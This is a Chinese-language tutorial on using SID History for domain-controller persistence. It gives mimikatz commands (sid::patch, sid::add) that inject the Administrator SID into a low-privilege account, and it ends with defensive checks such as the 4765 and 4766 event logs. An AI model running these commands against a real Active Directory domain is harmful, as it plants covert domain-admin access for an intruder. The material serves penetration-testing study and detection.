权限维持之：SID History 域控权限维持

目录

• 1 SID 作用
• 2 利用 SID History 操作过程
• 3 SID History 权限维持的防御

1 SID 作用

​ 每个用户都有自己的SID，SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限，SID History是在域迁移过程中需要使用的一个属性。

​ 如果A域中的域用户迁移到B域中，那么该用户的SID值就会改变，进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限，如果迁移后用户的SID值改变，系统会将原来的SID添加到迁移后用户的SID History属性中，使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz可以将SID History属性添加到任意用户的SID History属性中。在渗透测试中，如果获得了域管理员权限（或者等同于域管理员权限），就可以将SID History作为实现持久化的方法。

2 利用 SID History 操作过程

1. 使用域管理员权限的 Poweshell 查看 tester 用户的 SID History 属性

   Import-Module ActiveDirectory
   Get-ADUser tester -Properties sidhistory
   

2. 在域管理员权限的命令行窗口打开 mimikatz，将 Administrator 的 SID 添加到恶意用户 tester 的 SID History 属性中

   # 将高权限的 SID History 属性注入
   privilege::debug
   # 注入SID之前需要使用以下命令修复NTDS服务，否则无法将高权限的SID注人低权限用户的SID History属性;
   sid::patch
   sid::add /sam:tester /new:administrator
   
   # 查看 tester 用户的 SID History 属性
   Get-ADUser tester -Properties sidhistory
   
   # 清除恶意用户的 SID History 属性
   sid::clear /sam:username
   

   

   

3 SID History 权限维持的防御

1. 经常查看域用户中SID为500的用户。
2. 完成域迁移工作后,对有相同SID History属性的用户进行检查
3. 定期检查ID为4765和4766的日志。4765为将 SID Histtory属性添加到用户的日志。4766为将SID History属性添加到用户失败的日志。